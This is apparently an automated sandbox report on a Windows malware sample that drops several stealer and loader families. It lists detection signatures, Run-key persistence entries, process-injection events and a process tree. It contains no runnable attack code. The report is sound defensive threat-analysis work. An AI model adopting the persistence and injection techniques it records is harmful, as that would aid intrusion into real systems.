Malware Analysis Report

2025-01-23 11:20

Sample ID 231010-zlyjpacb55
Target file
SHA256 e8c975487099db4ca2b7d9a1f0c3901d22ffa6c476ae796a100db99945c63620
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google dropper evasion infostealer loader persistence phishing rat trojan mystic lutyr magia stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e8c975487099db4ca2b7d9a1f0c3901d22ffa6c476ae796a100db99945c63620

Threat Level: Known bad

The file file was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google dropper evasion infostealer loader persistence phishing rat trojan mystic lutyr magia stealer

SectopRAT

Detected google phishing page

Detects Healer an antivirus disabler dropper

Glupteba

RedLine

Amadey

DcRat

Glupteba payload

Detect Mystic stealer payload

RedLine payload

Healer

SmokeLoader

Mystic

SectopRAT payload

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Launches sc.exe

Program crash

Unsigned PE

Enumerates physical storage devices

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 20:48

Reported

2023-10-10 21:20

Platform

win7-20230831-en

Max time kernel

63s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detected google phishing page

phishing google

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Stops running service(s)

evasion

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Sn1qc8gI.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Sn1qc8gI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1Nd72JG2.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BE45.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\AB2D.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Sn1qc8gI.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2752 set thread context of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A004D941-67B2-11EE-8654-7AF708EF84A9} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1940 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe
PID 1940 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe
PID 1940 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe
PID 1940 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe
PID 1940 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe
PID 1940 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe
PID 1940 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe
PID 3064 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe
PID 3064 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe
PID 3064 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe
PID 3064 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe
PID 3064 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe
PID 3064 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe
PID 3064 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe
PID 2752 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2752 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2752 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2752 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2752 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2752 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2752 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2752 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2752 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2752 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2752 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\SysWOW64\WerFault.exe
PID 2752 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\SysWOW64\WerFault.exe
PID 2752 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\SysWOW64\WerFault.exe
PID 2752 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\SysWOW64\WerFault.exe
PID 2752 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\SysWOW64\WerFault.exe
PID 2752 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\SysWOW64\WerFault.exe
PID 2752 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\SysWOW64\WerFault.exe
PID 1260 wrote to memory of 2556 N/A N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe
PID 1260 wrote to memory of 2556 N/A N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe
PID 1260 wrote to memory of 2556 N/A N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe
PID 1260 wrote to memory of 2556 N/A N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe
PID 1260 wrote to memory of 2556 N/A N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe
PID 1260 wrote to memory of 2556 N/A N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe
PID 1260 wrote to memory of 2556 N/A N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe
PID 1260 wrote to memory of 2312 N/A N/A C:\Users\Admin\AppData\Local\Temp\B32A.exe
PID 1260 wrote to memory of 2312 N/A N/A C:\Users\Admin\AppData\Local\Temp\B32A.exe
PID 1260 wrote to memory of 2312 N/A N/A C:\Users\Admin\AppData\Local\Temp\B32A.exe
PID 1260 wrote to memory of 2312 N/A N/A C:\Users\Admin\AppData\Local\Temp\B32A.exe
PID 2556 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe
PID 2556 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe
PID 2556 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe
PID 2556 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe
PID 2556 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe
PID 2556 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe
PID 2556 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe
PID 2768 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe
PID 2768 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe
PID 2768 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe
PID 2768 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe
PID 2768 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe
PID 2768 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe
PID 2768 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe
PID 2552 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe
PID 2552 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe
PID 2552 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe
PID 2552 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe
PID 2552 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe
PID 2552 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe
PID 2552 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe
PID 2312 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\B32A.exe C:\Windows\SysWOW64\WerFault.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 36

C:\Users\Admin\AppData\Local\Temp\AB2D.exe

C:\Users\Admin\AppData\Local\Temp\AB2D.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe

C:\Users\Admin\AppData\Local\Temp\B32A.exe

C:\Users\Admin\AppData\Local\Temp\B32A.exe

